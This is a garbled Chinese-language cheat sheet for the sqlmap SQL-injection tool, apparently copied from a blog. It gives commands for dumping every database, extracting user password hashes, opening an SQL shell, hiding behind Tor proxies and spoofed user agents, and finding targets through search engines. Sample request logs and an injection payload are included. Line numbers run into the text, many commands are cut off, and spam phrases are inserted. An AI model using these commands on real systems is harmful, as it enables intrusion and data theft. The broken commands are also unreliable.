注入常用语句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23
注入常用语句
T users sinp> 4
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
DBMS: PostgreSQL
: users
id blissett
nameisnull bunny
ming
这个东西,是mickey整理的,不多说了,香港服务器,尊重一下原作者,转载注明mickey整理就好了
21 22更新
23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
m=1″ -v 1 –sql-shell //执行SQL语句
m更详细的信息
options from a configuration INI file 30 sqlmap -c sqlmap.conf
31 32使用POST方法提交
sqlmap/oracle/post_int.php” –method POST –data “id=1″
使用COOKIES方式提交,COOKIE的值用;分割,可以使用TamperData来抓COOKIEs
sqlmap使用referer欺骗
sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txt
sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt”
46 47使用基本认证
sqlmap使用Digest认证
sqlmap使用代理,配合TOR
sqlmap.1.47:3128″
sqlmap.1.47:8118″
56 57使用多线程猜解
sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
sqlmapp “id
sqlmapcatp “cat,id”
sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)”
64 65指定数据库,绕过SQLMAP的自动检测
sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”
MySQL
69* Oracle
70* PostgreSQL
71* Microsoft SQL Server
72 73指定操作系统,绕过SQLMAP自动检测
sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”
Linux
77* Windows
78 79自定义payload
80 Options: –prefix and –postfix
circumstances the vulnerable parameter is exploitable onlyif the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
users . “‘) LIMIT 0, 1″;:
.″ test”
87 88[...]
89[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
90[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
91[hh:mm:16] [TRAFFIC OUT] HTTP request:
92GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
93%28%27test%27=%27test HTTP/1.1
94Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
95Host: 192.168.1.121:80
96Accept-language: en-us,en;q=0.5
97Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
98image/png,*/*;q=0.5
99User-agent: sqlmap/0.7rc1 ()
100Connection: close
101[...]
102[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
103[...]
104105As you can see, the injection payload for testing for custom injection is:
106107id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
108109which URL decoded is:
test
makes the query syntatically correct to the page query:
users (‘test’='test’) LIMIT 0, 1
116117In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
118119页面比较
120python sqlmap.py -u “?id=1″ –string “luther” -v 1
121python sqlmap.py -u “?id=1″ –regexp “
lu[\w][\w]er” -v
122123排除网站的内容
124python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)”
125126多语句测试,php内嵌函数mysql_query(),不支持多语句
127python sqlmap.py -u “?id=1″ –stacked-test -v 1
128129union注入测试
130python sqlmap.py -u “?id=1″ –union-test -v 1
131132unionz注入配合orderby
133python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1
134135python sqlmap.py -u “?id=1″ -v 1 –union-use –banner
136python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user
137python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs
138139fingerprint
140python sqlmap.py -u “?id=1″ -v 1 -f
141python sqlmap.py -u “?name=luther” -v 1 -f -b
142143判断当前用户是否是dba
144python sqlmap.py -u “?id=1″ –is-dba -v 1
145146列举数据库用户
147python sqlmap.py -u “?id=1″ –users -v 0
148149列举数据库用户密码
150python sqlmap.py -u “?id=1″ –passwords -v 0
151python sqlmap.py -u “?id=1″ –passwords -U sa -v 0
152153查看用户权限
154python sqlmap.py -u “?id=1″ –privileges -v 0
155python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0
156157列数据库
158python sqlmap.py -u “?id=1″ –dbs -v 0
159160列出指定数据库指定表的列名
161python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1
162163列出指定数据库的指定表的指定列的内容
164python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0
165166指定列的范围从2-4
167python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0
168169导出所有数据库,所有表的内容
170python sqlmap.py -u “?id=1″ –dump-all -v 0
171172只列出用户自己新建的数据库和表的内容
173python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0
174175sql query
176python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0
177python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1
178179SELECT usename, passwd FROM pg_shadow ORDER BY usename
180181保存和恢复会话
182python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log”
183184保存选项到INC配置文件
185python sqlmap.py -u “?id=1″ -b -v 1 –save
=====================================================
2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,网站空间,可以直接修改为百度
1943、
195python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
199[hh:mm:26] [INFO] url is stable
id' is dynamic
id' is dynamic
id' is dynamic
id'204[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET
idid' is numeric/unescaped injectable
209[hh:mm:26] [INFO] testing MySQL
)
211[hh:mm:26] [INFO] retrieved: 55
212[hh:mm:26] [INFO] performed 20 queries in 0 seconds
213[hh:mm:26] [INFO] confirming MySQL
)
215[hh:mm:26] [INFO] retrieved: 1
216[hh:mm:26] [INFO] performed 13 queries in 0 seconds
217[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT
2180, 1
219[hh:mm:26] [INFO] retrieved: 5
220[hh:mm:26] [INFO] performed 13 queries in 0 seconds
221remote DBMS: MySQL >= 5.0.0
4、指定参数注入
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1
228-p "id"
[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
232[hh:mm:18] [INFO] url is stable
id'234[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter
[hh:mm:18] [INFO] confirming numeric/unescaped injection on
idid' is numeric/unescaped injectable
239[...]
Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v
2461 -p "cat,id"
5、指定方法和post的数据
250python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --
251data "id=1&cat=2"
6、指定COOKIE,可以注入一些需要登录的地址
255python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --COOKIE
256"COOKIE_VALUE"
7、通过代理注入
260python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy
261"http://127.0.0.1:8118"
2628、指定关键词,香港服务器,也可以不指定。程序会根据返回结果的hash自动判断
263python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string
264"STRING_ON_TRUE_PAGE"
2659、指定数据,这样就不用猜测其他的数据库里。可以提高效率。
266--remote-dbms
26710、指纹判别数据库类型
268python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f
26911、获取banner信息
270python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b
.